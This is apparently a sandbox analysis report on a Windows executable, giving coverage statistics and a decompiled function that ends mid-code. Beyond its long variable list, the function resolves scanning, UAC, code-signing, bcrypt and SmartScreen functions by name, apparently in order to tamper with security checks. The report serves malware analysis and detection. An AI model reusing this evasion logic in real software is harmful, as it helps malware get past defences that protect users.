Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: r096teIe1H.exePID: 6960, Parent PID: 3512COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.8%
Total number of Nodes:	203
Total number of Limit Nodes:	21

Executed Functions

Function 032BD8B0 Relevance: 200.7, APIs: 12, Strings: 99, Instructions: 6431
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E032BD8B0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				intOrPtr _v156;
				char _v160;
				char _v164;
				char _v168;
				intOrPtr _v172;
				char _v176;
				char _v180;
				char _v184;
				intOrPtr _v188;
				char _v192;
				char _v196;
				char _v200;
				intOrPtr _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				intOrPtr _v240;
				char _v244;
				char _v248;
				char _v252;
				intOrPtr _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				char _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				char _v592;
				char _v596;
				intOrPtr _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				intOrPtr _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				char _v664;
				char _v668;
				intOrPtr _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				char _v784;
				intOrPtr _v788;
				char _v792;
				char _v796;
				char _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				char _v816;
				char _v820;
				intOrPtr _v824;
				char _v828;
				char _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				char _v848;
				char _v852;
				intOrPtr _v856;
				char _v860;
				char _v864;
				char _v868;
				intOrPtr _v872;
				char _v876;
				char _v880;
				char _v884;
				intOrPtr _v888;
				char _v892;
				char _v896;
				char _v900;
				intOrPtr _v904;
				char _v908;
				char _v912;
				char _v916;
				intOrPtr _v920;
				char _v924;
				char _v928;
				char _v932;
				intOrPtr _v936;
				char _v940;
				char _v944;
				char _v948;
				char _v952;
				char _v956;
				char _v960;
				char _v964;
				char _v968;
				intOrPtr _v972;
				char _v976;
				char _v980;
				char _v984;
				intOrPtr _v988;
				char _v992;
				char _v996;
				char _v1000;
				intOrPtr _v1004;
				char _v1008;
				char _v1012;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				intOrPtr _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1076;
				char _v1080;
				intOrPtr _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				intOrPtr _v1100;
				char _v1104;
				char _v1108;
				_Unknown_base(*)()* _v1112;
				char _v1116;
				intOrPtr _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				intOrPtr _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				char _v1176;
				char _v1180;
				char _v1184;
				intOrPtr _v1188;
				char _v1192;
				char _v1196;
				char _v1200;
				intOrPtr _v1204;
				char _v1208;
				char _v1212;
				char _v1216;
				intOrPtr _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				intOrPtr _v1236;
				char _v1240;
				char _v1244;
				char _v1248;
				intOrPtr _v1252;
				char _v1256;
				char _v1260;
				char _v1264;
				intOrPtr _v1268;
				char _v1272;
				char _v1276;
				char _v1280;
				char _v1284;
				intOrPtr _v1288;
				char _v1292;
				char _v1296;
				char _v1300;
				intOrPtr _v1304;
				char _v1308;
				char _v1312;
				char _v1316;
				intOrPtr _v1320;
				char _v1324;
				char _v1328;
				char _v1332;
				intOrPtr _v1336;
				char _v1340;
				char _v1344;
				char _v1348;
				char _v1352;
				intOrPtr _v1356;
				char _v1360;
				char _v1364;
				char _v1368;
				intOrPtr _v1372;
				char _v1376;
				char _v1380;
				char _v1384;
				intOrPtr _v1388;
				char _v1392;
				char _v1396;
				char _v1400;
				intOrPtr _v1404;
				char _v1408;
				char _v1412;
				char _v1416;
				char _v1420;
				char _v1424;
				intOrPtr _v1428;
				char _v1432;
				char _v1436;
				char _v1440;
				intOrPtr _v1444;
				char _v1448;
				char _v1452;
				char _v1456;
				intOrPtr _v1460;
				char _v1464;
				char _v1468;
				char _v1472;
				intOrPtr _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				intOrPtr _v1492;
				char _v1496;
				char _v1500;
				char _v1504;
				intOrPtr _v1508;
				char _v1512;
				char _v1516;
				char _v1520;
				char _v1524;
				intOrPtr _v1528;
				char _v1532;
				char _v1536;
				char _v1540;
				intOrPtr _v1544;
				char _v1548;
				char _v1552;
				char _v1556;
				char _v1560;
				intOrPtr _v1564;
				char _v1568;
				char _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				char _v1588;
				char _v1592;
				intOrPtr _v1596;
				char _v1600;
				char _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				char _v1620;
				char _v1624;
				intOrPtr _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _v1644;
				char _v1648;
				char _v1652;
				char _v1656;
				intOrPtr _v1660;
				char _v1664;
				intOrPtr _v1668;
				char _v1672;
				char _v1676;
				char _v1680;
				intOrPtr _v1684;
				char _v1688;
				char _v1692;
				char _v1696;
				intOrPtr _v1700;
				char _v1704;
				char _v1708;
				intOrPtr _v1712;
				char _v1716;
				intOrPtr _v1720;
				char _v1724;
				char _v1728;
				char _v1732;
				intOrPtr _v1736;
				char _v1740;
				char _v1744;
				char _v1748;
				intOrPtr _v1752;
				char _v1756;
				char _v1760;
				char _v1764;
				char _v1768;
				char _v1772;
				char _v1776;
				char _v1780;
				intOrPtr _v1784;
				char _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v1800;
				intOrPtr _v1804;
				char _v1808;
				char _v1812;
				char _v1816;
				intOrPtr _v1820;
				char _v1824;
				char _v1828;
				char _v1832;
				intOrPtr _v1836;
				char _v1840;
				char _v1844;
				char _v1848;
				intOrPtr _v1852;
				char _v1856;
				char _v1860;
				char _v1864;
				intOrPtr _v1868;
				char _v1872;
				char _v1876;
				char _v1880;
				char _v1884;
				char _v1888;
				char _v1892;
				intOrPtr _v1896;
				char _v1900;
				char _v1904;
				char _v1908;
				intOrPtr _v1912;
				char _v1916;
				char _v1920;
				char _v1924;
				intOrPtr _v1928;
				char _v1932;
				char _v1936;
				char _v1940;
				intOrPtr _v1944;
				char _v1948;
				char _v1952;
				char _v1956;
				intOrPtr _v1960;
				char _v1964;
				char _v1968;
				char _v1972;
				intOrPtr _v1976;
				char _v1980;
				char _v1984;
				char _v1988;
				intOrPtr _v1992;
				char _v1996;
				char _v2000;
				char _v2004;
				intOrPtr _v2008;
				char _v2012;
				char _v2016;
				void* _v2020;
				char _v2024;
				char _v2028;
				char _v2032;
				intOrPtr _v2036;
				char _v2040;
				char _v2044;
				char _v2048;
				intOrPtr _v2052;
				char _v2056;
				char _v2060;
				char _v2064;
				char _v2068;
				char _v2072;
				intOrPtr _v2076;
				char _v2080;
				char _v2084;
				char _v2088;
				intOrPtr _v2092;
				char _v2096;
				char _v2100;
				char _v2104;
				intOrPtr _v2108;
				char _v2156;
				char _v2160;
				char _v2172;
				char _v2204;
				intOrPtr _v2208;
				char _v2212;
				char _v2216;
				char _v2220;
				intOrPtr _v2224;
				char _v2228;
				char _v2232;
				char _v2236;
				char _v2240;
				intOrPtr _v2244;
				char _v2248;
				char _v2252;
				char _v2256;
				intOrPtr _v2260;
				char _v2264;
				char _v2268;
				char _v2272;
				intOrPtr _v2276;
				char _v2280;
				char _v2284;
				char _v2288;
				char _v2292;
				intOrPtr _v2296;
				char _v2300;
				char _v2304;
				char _v2308;
				intOrPtr _v2312;
				char _v2316;
				char _v2320;
				char _v2324;
				intOrPtr _v2328;
				char _v2332;
				char _v2336;
				char _v2340;
				char _v2344;
				char _v2348;
				intOrPtr _v2352;
				char _v2356;
				char _v2360;
				char _v2364;
				intOrPtr _v2368;
				char _v2372;
				char _v2376;
				char _v2380;
				intOrPtr _v2384;
				char _v2388;
				char _v2392;
				char _v2396;
				intOrPtr _v2400;
				char _v2404;
				intOrPtr _v2408;
				char _v2412;
				char _v2416;
				char _v2420;
				char _v2424;
				intOrPtr _v2428;
				char _v2432;
				char _v2436;
				char _v2440;
				intOrPtr _v2444;
				char _v2448;
				char _v2452;
				char _v2456;
				intOrPtr _v2460;
				char _v2464;
				char _v2468;
				char _v2472;
				char _v2476;
				intOrPtr _v2480;
				char _v2484;
				char _v2488;
				char _v2492;
				intOrPtr _v2496;
				char _v2548;
				char _v2552;
				char _v2556;
				char _v2560;
				char _v2568;
				char _v2576;
				char _v2664;
				char _v2668;
				char _v2672;
				char _v2676;
				char _v2776;
				char _v2780;
				char _v2784;
				char _v2788;
				char _v2940;
				char _v2944;
				char _v2948;
				char _v2952;
				char _v2968;
				char _v3084;
				char _v3404;
				char _v3428;
				char _v3460;
				char _v3472;
				char _v3476;
				intOrPtr _v3480;
				char _v3484;
				char _v3488;
				char _v3492;
				intOrPtr _v3496;
				char _v3500;
				char _v3504;
				char _v3508;
				intOrPtr _v3512;
				char _v3516;
				char _v3520;
				char _v3524;
				intOrPtr _v3528;
				char _v3532;
				char _v3536;
				char _v3540;
				intOrPtr _v3544;
				char _v3548;
				char _v3552;
				char _v3556;
				intOrPtr _v3560;
				char _v3564;
				char _v3568;
				char _v3572;
				intOrPtr _v3576;
				char _v3580;
				char _v3584;
				char _v3588;
				char _v3592;
				intOrPtr _v3596;
				char _v3600;
				char _v3604;
				char _v3608;
				char _v3612;
				intOrPtr _v3616;
				char _v3620;
				char _v3624;
				char _v3628;
				intOrPtr _v3632;
				char _v3636;
				char _v3640;
				char _v3644;
				intOrPtr _v3648;
				char _v3652;
				char _v3656;
				char _v3660;
				intOrPtr _v3664;
				char _v3668;
				char _v3672;
				char _v3676;
				intOrPtr _v3680;
				char _v3684;
				char _v3688;
				char _v3692;
				intOrPtr _v3696;
				char _v3700;
				char _v3704;
				char _v3708;
				intOrPtr _v3712;
				char _v3716;
				char _v3720;
				char _v3724;
				intOrPtr _v3728;
				char _v3732;
				char _v3736;
				char _v3740;
				intOrPtr _v3744;
				char _v3748;
				char _v3752;
				char _v3756;
				intOrPtr _v3760;
				char _v3764;
				char _v3768;
				char _v3772;
				intOrPtr _v3776;
				char _v3780;
				char _v3784;
				char _v3820;
				intOrPtr _v3824;
				char _v3828;
				char _v3832;
				char _v3836;
				intOrPtr _v3840;
				char _v3844;
				char _v3848;
				char _v3852;
				intOrPtr _v3856;
				char _v3860;
				char _v3864;
				char _v3868;
				intOrPtr _v3872;
				char _v3876;
				char _v3880;
				char _v3884;
				intOrPtr _v3888;
				char _v3892;
				char _v3896;
				char _v3900;
				intOrPtr _v3904;
				char _v3908;
				char _v3912;
				char _v3916;
				intOrPtr _v3920;
				char _v3924;
				char _v3928;
				char _v3932;
				intOrPtr _v3936;
				char _v3940;
				char _v3944;
				char _v3948;
				intOrPtr _v3952;
				char _v3956;
				char _v3960;
				char _v3964;
				char _v3968;
				char _v3972;
				intOrPtr _v3976;
				char _v3980;
				char _v3984;
				char _v3988;
				intOrPtr _v3992;
				char _v3996;
				char _v4000;
				char _v4004;
				intOrPtr _v4008;
				char _v4012;
				char _v4016;
				char _v4020;
				char _v4024;
				char _v4028;
				char _v4032;
				char _v4036;
				intOrPtr _v4040;
				char _v4044;
				char _v4048;
				char _v4052;
				intOrPtr _v4056;
				char _v4060;
				char _v4064;
				char _v4068;
				intOrPtr _v4072;
				char _v4076;
				char _v4080;
				char _v4084;
				intOrPtr _v4088;
				char _v4092;
				char _v4096;
				char _v4100;
				intOrPtr _v4104;
				char _v4108;
				char _v4112;
				char _v4116;
				intOrPtr _v4120;
				char _v4124;
				char _v4128;
				char _v4132;
				intOrPtr _v4136;
				char _v4140;
				char _v4144;
				char _v4148;
				intOrPtr _v4152;
				char _v4156;
				char _v4160;
				char _v4164;
				intOrPtr _v4168;
				char _v4172;
				char _v4176;
				char _v4180;
				intOrPtr _v4184;
				char _v4188;
				char _v4192;
				intOrPtr _v4196;
				char _v4200;
				char _v4204;
				intOrPtr _v4208;
				char _v4212;
				char _v4216;
				char _v4220;
				intOrPtr _v4224;
				char _v4228;
				char _v4232;
				char _v4236;
				intOrPtr _v4240;
				char _v4244;
				char _v4248;
				char _v4252;
				intOrPtr _v4256;
				char _v4260;
				char _v4264;
				char _v4268;
				intOrPtr _v4272;
				char _v4276;
				char _v4280;
				char _v4284;
				char _v4288;
				intOrPtr _v4292;
				char _v4296;
				char _v4300;
				char _v4304;
				intOrPtr _v4308;
				char _v4312;
				char _v4316;
				char _v4320;
				char _v4324;
				char _v4328;
				char _v4332;
				intOrPtr _v4336;
				char _v4340;
				char _v4344;
				char _v4348;
				intOrPtr _v4352;
				char _v4356;
				char _v4360;
				char _v4364;
				intOrPtr _v4368;
				char _v4372;
				char _v4376;
				char _v4380;
				intOrPtr _v4384;
				char _v4388;
				char _v4392;
				char _v4396;
				intOrPtr _v4400;
				char _v4404;
				char _v4408;
				char _v4412;
				intOrPtr _v4416;
				char _v4420;
				char _v4424;
				char _v4428;
				char _v4432;
				char _v4436;
				intOrPtr _v4440;
				char _v4444;
				char _v4448;
				char _v4452;
				intOrPtr _v4456;
				char _v4460;
				char _v4464;
				char _v4468;
				intOrPtr _v4472;
				char _v4476;
				char _v4480;
				char _v4484;
				char _v4488;
				char _v4492;
				char _v4496;
				char _v4500;
				char _v4504;
				char _v4508;
				char _v4512;
				char _v4516;
				char _v4520;
				char _v4524;
				char _v4528;
				char _v4532;
				char _v4536;
				char _v4540;
				char _v4544;
				char _v4548;
				char _v4552;
				char _v4556;
				intOrPtr _v4560;
				char _v4564;
				char _v4568;
				char _v4572;
				intOrPtr _v4576;
				char _v4580;
				char _v4584;
				char _v4588;
				intOrPtr _v4592;
				char _v4596;
				char _v4600;
				char _v4604;
				char _v4608;
				char _v4612;
				char _v4616;
				char _v4620;
				char _v4624;
				char _v4628;
				char _v4632;
				char _v4636;
				char _v4640;
				char _v4644;
				char _v4648;
				char _v4652;
				char _v4656;
				char _v4660;
				char _v4664;
				char _v4668;
				char _v4672;
				char _v4676;
				char _v4680;
				char _v4684;
				char _v4688;
				char _v4692;
				char _v4696;
				char _v4700;
				char _v4704;
				char _v4708;
				char _v4712;
				char _v4716;
				char _v4720;
				char _v4724;
				char _v4728;
				char _v4732;
				char _v4736;
				char _v4740;
				char _v4744;
				char _v4748;
				char _v4752;
				char _v4756;
				char _v4760;
				char _v4764;
				char _v4768;
				char _v4772;
				char _v4776;
				char _v4780;
				intOrPtr _v4784;
				char _v4788;
				char _v4792;
				char _v4796;
				intOrPtr _v4800;
				char _v4804;
				char _v4808;
				char _v4812;
				intOrPtr _v4816;
				char _v4820;
				char _v4824;
				void* _t2163;
				void* _t2289;
				void* _t2447;
				_Unknown_base(*)()* _t2477;
				void* _t2912;
				_Unknown_base(*)()* _t3812;
				_Unknown_base(*)()* _t3979;
				_Unknown_base(*)()* _t4435;
				_Unknown_base(*)()* _t4453;
				void* _t4535;
				_Unknown_base(*)()* _t5093;
				_Unknown_base(*)()* _t5273;
				_Unknown_base(*)()* _t5334;
				void* _t5448;
				_Unknown_base(*)()* _t5539;
				_Unknown_base(*)()* _t5540;
				void* _t5542;
				intOrPtr _t5566;
				intOrPtr _t5590;
				_Unknown_base(*)()* _t5691;
				_Unknown_base(*)()* _t5702;
				void* _t5792;
				void* _t5797;
				void* _t5802;
				void* _t5805;
				void* _t5808;
				void* _t5811;
				void* _t5814;
				void* _t5817;
				void* _t5820;
				void* _t5823;
				void* _t5826;
				void* _t5829;
				void* _t5832;
				void* _t5835;
				void* _t5838;
				void* _t5843;
				void* _t5848;
				void* _t5853;
				void* _t5858;
				void* _t5865;
				void* _t5871;
				void* _t5879;
				void* _t5884;
				void* _t5889;
				void* _t5894;
				void* _t5900;
				void* _t5905;
				void* _t5910;
				void* _t5916;
				void* _t5922;
				void* _t5927;
				void* _t5935;
				void* _t5940;
				void* _t5947;
				void* _t5952;
				void* _t5957;
				void* _t5966;
				void* _t5971;
				void* _t5976;
				void* _t5981;
				intOrPtr _t5982;
				intOrPtr _t6009;
				intOrPtr _t6018;
				void* _t6030;
				void* _t6035;
				void* _t6040;
				void* _t6045;
				void* _t6052;
				void* _t6057;
				void* _t6062;
				void* _t6067;
				void* _t6074;
				void* _t6079;
				void* _t6084;
				void* _t6089;
				intOrPtr _t6090;
				void* _t6097;
				void* _t6102;
				void* _t6107;
				void* _t6112;
				void* _t6141;
				void* _t6146;
				void* _t6152;
				void* _t6157;
				void* _t6163;
				void* _t6168;
				void* _t6173;
				void* _t6178;
				void* _t6184;
				void* _t6189;
				void* _t6196;
				void* _t6201;
				void* _t6206;
				void* _t6213;
				void* _t6218;
				void* _t6223;
				void* _t6231;
				void* _t6236;
				void* _t6241;
				void* _t6247;
				void* _t6252;
				void* _t6257;
				void* _t6263;
				void* _t6268;
				void* _t6273;
				void* _t6278;
				void* _t6283;
				void* _t6288;
				void* _t6295;
				void* _t6300;
				void* _t6305;
				void* _t6308;
				void* _t6313;
				void* _t6318;
				void* _t6323;
				void* _t6326;
				void* _t6329;
				void* _t6332;
				void* _t6335;
				void* _t6338;
				void* _t6341;
				void* _t6344;
				void* _t6347;
				void* _t6350;
				void* _t6371;
				void* _t6376;
				void* _t6381;
				void* _t6384;
				void* _t6387;
				void* _t6390;
				void* _t6393;
				void* _t6396;
				void* _t6399;
				void* _t6402;
				void* _t6405;
				void* _t6408;
				void* _t6411;
				void* _t6414;
				void* _t6417;
				void* _t6420;
				void* _t6423;
				void* _t6426;
				void* _t6429;
				void* _t6432;
				void* _t6435;
				void* _t6438;
				void* _t6441;
				void* _t6444;
				void* _t6447;
				void* _t6452;
				void* _t6457;
				void* _t6462;
				void* _t6468;
				void* _t6473;
				void* _t6481;
				void* _t6486;
				void* _t6491;
				void* _t6496;
				void* _t6501;
				void* _t6506;
				void* _t6512;
				void* _t6517;
				void* _t6524;
				void* _t6529;
				void* _t6533;
				void* _t6538;
				void* _t6543;
				void* _t6548;
				void* _t6555;
				void* _t6560;
				void* _t6566;
				void* _t6571;
				void* _t6577;
				void* _t6582;
				void* _t6587;
				void* _t6592;
				void* _t6597;
				void* _t6602;
				void* _t6615;
				void* _t6620;
				void* _t6625;
				void* _t6630;
				void* _t6635;
				void* _t6640;
				void* _t6646;
				void* _t6653;
				void* _t6658;
				void* _t6663;
				void* _t6668;
				void* _t6675;
				void* _t6680;
				void* _t6685;
				void* _t6690;
				void* _t6697;
				void* _t6702;
				void* _t6707;
				intOrPtr _t6708;
				void* _t6715;
				void* _t6721;
				void* _t6726;
				void* _t6731;
				void* _t6739;
				intOrPtr _t6743;
				void* _t6750;
				void* _t6755;
				void* _t6760;
				void* _t6767;
				void* _t6772;
				void* _t6777;
				void* _t6782;
				void* _t6787;
				void* _t6794;
				void* _t6799;
				void* _t6804;
				void* _t6809;
				void* _t6814;
				void* _t6818;
				void* _t6823;
				void* _t6828;
				void* _t6833;
				void* _t6838;
				void* _t6843;
				void* _t6848;
				void* _t6854;
				void* _t6859;
				void* _t6870;
				void* _t6875;
				void* _t6883;
				void* _t6888;
				intOrPtr _t6892;
				void* _t6897;
				void* _t6902;
				void* _t6908;
				void* _t6913;
				void* _t6920;
				void* _t6925;
				void* _t6930;
				void* _t6935;
				void* _t6940;
				void* _t6945;
				void* _t6951;
				void* _t6956;
				void* _t6961;
				void* _t6966;
				void* _t6973;
				void* _t6978;
				void* _t6983;
				void* _t6988;
				void* _t6993;
				void* _t6998;
				void* _t7004;
				void* _t7009;
				void* _t7014;
				void* _t7019;
				void* _t7024;
				void* _t7029;
				void* _t7036;
				void* _t7041;
				void* _t7046;
				void* _t7051;
				void* _t7056;
				void* _t7061;
				void* _t7066;
				void* _t7071;
				void* _t7076;
				void* _t7081;
				void* _t7086;
				void* _t7091;
				void* _t7096;
				void* _t7101;
				void* _t7104;
				void* _t7105;
				intOrPtr _t7107;
				intOrPtr _t7108;
				void* _t7122;
				void* _t7125;

				_t7125 = __fp0;
				_t7105 = __esi;
				_t7104 = __edi;
				_t7107 = _t7108;
				_t5542 = 0x25a;
				do {
					_push(0);
					_push(0);
					_t5542 = _t5542 - 1;
				} while (_t5542 != 0);
				_push(_t5542);
				_push(__ebx);
				_push(_t7107);
				_push(0x32c6a6b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t7108;
				_push(0x8ae); // executed
				L032B7B0C(); // executed
				if(0 == 0) {
					E032A44F4(0x33d28a8, 0x32c6a94);
				} else {
					E032A44F4(0x33d28a8, 0x32c6a84);
				}
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v8, E032A4964(_v12));
				_push(_v8);
				E032A47B0( &_v20,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v16, E032A4964(_v20));
				_pop(_t5792); // executed
				E032B7C04(_v16,  *0x33d28a8, _t5792, 0); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v24, E032A4964(_v28));
				_push(_v24);
				E032A47B0( &_v36,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v32, E032A4964(_v36));
				_pop(_t5797); // executed
				E032B7C04(_v32,  *0x33d28a8, _t5797, 0); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v40, E032A4964(_v44));
				_push(_v40);
				_t5545 =  *0x33d28a8;
				E032A47B0( &_v52,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v48, E032A4964(_v52));
				_pop(_t5802); // executed
				E032B7C04(_v48,  *0x33d28a8, _t5802, 0); // executed
				E032A4698( &_v56, "TrustOpenStores");
				_push(_v56);
				E032A4698( &_v60, "wintrust");
				_pop(_t5805); // executed
				E032B7C04(_v60,  *0x33d28a8, _t5805, 0); // executed
				E032A4698( &_v64, "WintrustAddActionID");
				_push(_v64);
				E032A4698( &_v68, "wintrust");
				_pop(_t5808); // executed
				E032B7C04(_v68,  *0x33d28a8, _t5808, 0); // executed
				E032A4698( &_v72, "FindCertsByIssuer");
				_push(_v72);
				E032A4698( &_v76, "wintrust");
				_pop(_t5811); // executed
				E032B7C04(_v76,  *0x33d28a8, _t5811, 0); // executed
				E032A4698( &_v80, "CryptSIPGetInfo");
				_push(_v80);
				E032A4698( &_v84, "mssip32");
				_pop(_t5814); // executed
				E032B7C04(_v84, _t5545, _t5814, 0); // executed
				E032A4698( &_v88, "CryptSIPVerifyIndirectData");
				_push(_v88);
				E032A4698( &_v92, "mssip32");
				_pop(_t5817); // executed
				E032B7C04(_v92, _t5545, _t5817, 0); // executed
				E032A4698( &_v96, "CryptSIPGetSignedDataMsg");
				_push(_v96);
				E032A4698( &_v100, "mssip32");
				_pop(_t5820); // executed
				E032B7C04(_v100, _t5545, _t5820, 0); // executed
				E032A4698( &_v104, "BCryptVerifySignature");
				_push(_v104);
				E032A4698( &_v108, "bcrypt");
				_pop(_t5823); // executed
				E032B7C04(_v108, _t5545, _t5823, 0); // executed
				E032A4698( &_v112, "BCryptQueryProviderRegistration");
				_push(_v112);
				E032A4698( &_v116, "bcrypt");
				_pop(_t5826); // executed
				E032B7C04(_v116, _t5545, _t5826, 0); // executed
				E032A4698( &_v120, "BCryptRegisterProvider");
				_push(_v120);
				E032A4698( &_v124, "bcrypt");
				_pop(_t5829);
				E032B7C04(_v124, _t5545, _t5829, 0);
				E032A4698( &_v128, "DllGetClassObject");
				_push(_v128);
				E032A4698( &_v132, "smartscreenps");
				_pop(_t5832); // executed
				E032B7C04(_v132, _t5545, _t5832, 0); // executed
				E032A4698( &_v136, "DllGetActivationFactory");
				_push(_v136);
				E032A4698( &_v140, "smartscreenps");
				_pop(_t5835); // executed
				E032B7C04(_v140, _t5545, _t5835, 0); // executed
				E032A4698( &_v144, "DllRegisterServer");
				_push(_v144);
				E032A4698( &_v148, "smartscreenps");
				_pop(_t5838); // executed
				E032B7C04(_v148, _t5545, _t5838, 0); // executed
				E032A2EE0();
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v152, E032A4964(_v156));
				_push(_v152);
				E032A47B0( &_v164,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v160, E032A4964(_v164));
				_pop(_t5843); // executed
				E032B7C04(_v160,  *0x33d28a8, _t5843, 0); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("UacScan");
				E032A4824();
				E032A4698( &_v168, E032A4964(_v172));
				_push(_v168);
				E032A47B0( &_v180,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v176, E032A4964(_v180));
				_pop(_t5848); // executed
				E032B7C04(_v176,  *0x33d28a8, _t5848, 0); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v184, E032A4964(_v188));
				_push(_v184);
				E032A47B0( &_v196,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v192, E032A4964(_v196));
				_pop(_t5853); // executed
				E032B7C04(_v192,  *0x33d28a8, _t5853, 0); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v200, E032A4964(_v204));
				_push(_v200);
				E032A47B0( &_v212,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v208, E032A4964(_v212));
				_pop(_t5858); // executed
				E032B7C04(_v208,  *0x33d28a8, _t5858, 0); // executed
				E032A4698(0x33d2844, E032A4964( *((intOrPtr*)(0x32c9ad4 + E032B7CF8(1, 3) * 4))));
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v216, E032A4964(_v220));
				_push(_v216);
				E032A47B0( &_v228,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v224, E032A4964(_v228));
				_pop(_t5865); // executed
				E032B7C04(_v224,  *0x33d28a8, _t5865, 0); // executed
				E032A47B0( &_v232,  *0x33d2844, "C:\\Windows\\System32\\");
				_t2163 = E032A7E40(_v232);
				_t7113 = _t2163;
				if(_t2163 == 0) {
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v252, E032A4964(_v256));
					_push(_v252);
					E032A47B0( &_v264,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v260, E032A4964(_v264));
					_pop(_t5871);
					E032B7C04(_v260,  *0x33d28a8, _t5871, __eflags);
					E032A44F4(0x33d2820, "iexpress.exe");
				} else {
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v236, E032A4964(_v240));
					_push(_v236);
					E032A47B0( &_v248,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v244, E032A4964(_v248));
					_pop(_t7101); // executed
					E032B7C04(_v244,  *0x33d28a8, _t7101, _t7113); // executed
					E032A44F4(0x33d2820,  *0x33d2844);
				}
				E032AC348(0,  &_v268);
				E032A44F4(0x33d2800, _v268);
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("UacScan");
				E032A4824();
